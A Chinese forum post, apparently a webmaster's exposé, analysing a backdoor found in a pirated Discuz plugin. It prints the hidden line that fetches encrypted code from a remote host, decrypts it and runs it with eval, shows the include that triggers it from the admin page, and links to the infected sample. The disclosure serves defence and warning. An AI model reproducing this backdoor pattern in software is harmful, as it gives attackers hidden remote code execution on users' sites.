12558网页游戏私服论坛

 找回密码
 立即注册
游戏开服表 申请开服
游戏名称 游戏描述 开服状态 游戏福利 运营商 游戏链接
攻城掠地-仿官 全新玩法,觉醒武将,觉醒技能 每周新区 经典复古版本,长久稳定 进入游戏
巅峰新版攻 攻城掠地公益服 攻城掠地SF 新兵种、新武将(兵种) 进入游戏
攻城掠地公 散人玩家的天堂 新开 进入游戏
改版攻城掠 上线即可国战PK 稳定新区 全新改版,功能强大 进入游戏
少年江山 高福利高爆率 刚开一秒 江湖水落潜蛟龙 进入游戏
太古封魔录 开服送10亿钻石 福利多多 不用充钱也可升级 进入游戏
神魔之道 签到送元宝 稳定开新区 送豪华签到奖励 进入游戏
神奇三国 统帅三军,招揽名将 免费玩新区 激情国战,征战四方 进入游戏
龙符 三日豪礼领到爽 天天开新区 助你征战无双 进入游戏
王者之师 免费领豪华奖励 免费玩新区 6元送6888元宝 进入游戏
三国霸业 战车-珍宝-觉醒-攻城掠地SF-全新玩法 免费玩新区 攻城掠地私服 进入游戏
手游私服盒子 各类免费游戏 0.1折送海量资源 各类手游私服 进入游戏
皇家MU2 《奇迹 2:传奇》韩国网禅公司《奇迹》正统续作。 3D锁视角Mmrpg 暗黑3+传奇+流放之路+奇迹 进入游戏
查看: 396|回复: 0

【续集】魔趣吧的东西真的有后门木马,揭秘用盗版的危害

[复制链接]

3782

主题

3782

帖子

214748万

积分

超级版主

Rank: 8Rank: 8

积分
2147483647
发表于 2020-8-21 13:14:12 | 显示全部楼层 |阅读模式
上次写了一篇文章 披露了盗版市场的乱象 ,没想到本人遭到魔趣吧的站长疯狂的报复。我本身的网站已经持续快10天魔趣吧的站长使用DDOS攻击技术,打不开了!由于在其网站进行了手机绑定,手机也整天被短信+电话轰炸!搞的我近来经常要开飞行模式!
但是我是绝对不会像黑恶权势低头的,大不了我网站不做了,手机号码不用了!

前文回顾:魔趣吧的东西好像真的有后门木马,改了我dz的后台密码
https://www.dismall.com/thread-5095-1-1.html

由于前面的那篇文章写的比力概况,没有列举证据(导致其大肆误导不明原形的群众说我在造谣),今天我就来列举一些证据,并对已知的后门进行深入详细的分析!
这可能是最后一篇曝光盗版市场乱象的文章了,由于我只是一个普普通通的站长!那些江湖履历丰富的站长我惹不起,我也见识了魔趣吧是假如把黑的说成白的!

他的理念就是只要对他有利的都是好文章,曝光他的都是在造谣他!

在正式进入主题之前,我想在说几句题外话:先不说他有没有干些见不得人的事,其损坏原创开辟者权益,谋取本身的长处(俗称:盗版),还有什么资格在那一副正人君子的模样怼这个怼那个!

【下面才是今天要说的主题】
由于带后门的资源有点多,今天我就随便拿个在魔趣吧收费的资源,且我之前安装过,受害的资源来做分析!

样本下载链接:为了不给他打广告,帖子ID: 9183 ,知道他网站的随便打开一个帖子把id换成这个就可以定位到!

由于是VIP资源,以是我分享到了蓝奏网盘:https://wws.lanzous.com/iH9IQe6jymf  密码:c9mx

附件MD5值:C03B189CA9E0EA7F1229F609A48EC705
防止由于我的曝光,他会修改附件,然后狡辩!对本文有异议的朋侪可以在本文发布不久的时候,前去下载对比MD5值后,并效验是不是存在本文提到的后门木马!

样本插件名称:积分提现中心 V1.2

木马文件所在路径:keke_tixian\function\function_core.php


木马完整代码:

关键代码:

  • $iloveyou = caidi($oo);eval($iloveyou(strip_tags(contentz($love))));


有了这些信息 我们下面进行分析(在这里大胆的猜测一下:文件完满是魔趣吧本身加进去的,正版可能就没有这个文件,由于这个文件代码满是和后门有关!和插件自身功能没有关系)
在关键代码前面的都是木马伪装所需要用到的函数 实行过程如下:
1/----------------------

后门脚本实行入口:keke_tixian\admin.inc.php
关键代码在该文件第7行:引用后门文件并实行
require_once DISCUZ_ROOT .'./source/plugin/keke_tixian/function/function_core.php';
表明:只要安装插件一打开后台的插件设置,木马就主动实行了!

2/--------依次实行----------


$iloveyou = caidi($oo);
表明:定义一个名为   iloveyou 的变量  ,值为: caidi($oo)
调试: $iloveyou = caidi($oo); echo $iloveyou.$love; exit; ,得到 iloveyou 的值即是:decrypt
备注:函数 caidi 定义并赋值了  $love  作全局变量, love 的值即是:htt去p://zonekey.w掉in/b中ai文duseo.xml  (去掉中文)

3/--------依次实行----------

eval($iloveyou(strip_tags(contentz($love))));

表明:已知 iloveyou 的值即是:decrypt,得到 eval(decrypt(strip_tags(contentz(htt去p://zonekey.w掉in/b中ai文duseo.xml))));

分析函数 contentz 得知该函数 是访问长途链接并返回内容,相称于 curl
分析函数 decrypt 得知该函数 是进行内容解密,直接调用了DISCUZ自带的解密函数 authcode


表明的表明:代码 eval($iloveyou(strip_tags(contentz($love)))); ,颠末层层分析,终极为:
实行脚本 ( 解密 ( 访问长途代码 ( htt去p://zonekey.w掉in/b中ai文duseo.xml ) ) ) );

4/--------依次实行----------

htt去p://zonekey.w掉in/b中ai文duseo.xml 该链接如今访问返回的全部是 1111111111111111,以是无法继续分析长途的代码是什么!

可能魔趣吧站长已经知道我接下来会深入曝光他。以是暂时把长途代码先全部改成了 1111111111111111
即使是这样!又如何? 实行长途脚本 有什么危害?信赖做网站的都知道!这里我不进行科普!感兴趣的站长可以百度自行科普:例:一句话木马,菜刀!
下面的代码是我网站主动多出来的一个文件:由于无法继续分析,直接看结果
<ol>
楼主热帖
回复

使用道具 举报

*滑块验证:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|12558网页游戏私服论坛 |网站地图

GMT+8, 2024-11-24 19:32 , Processed in 0.093750 second(s), 30 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表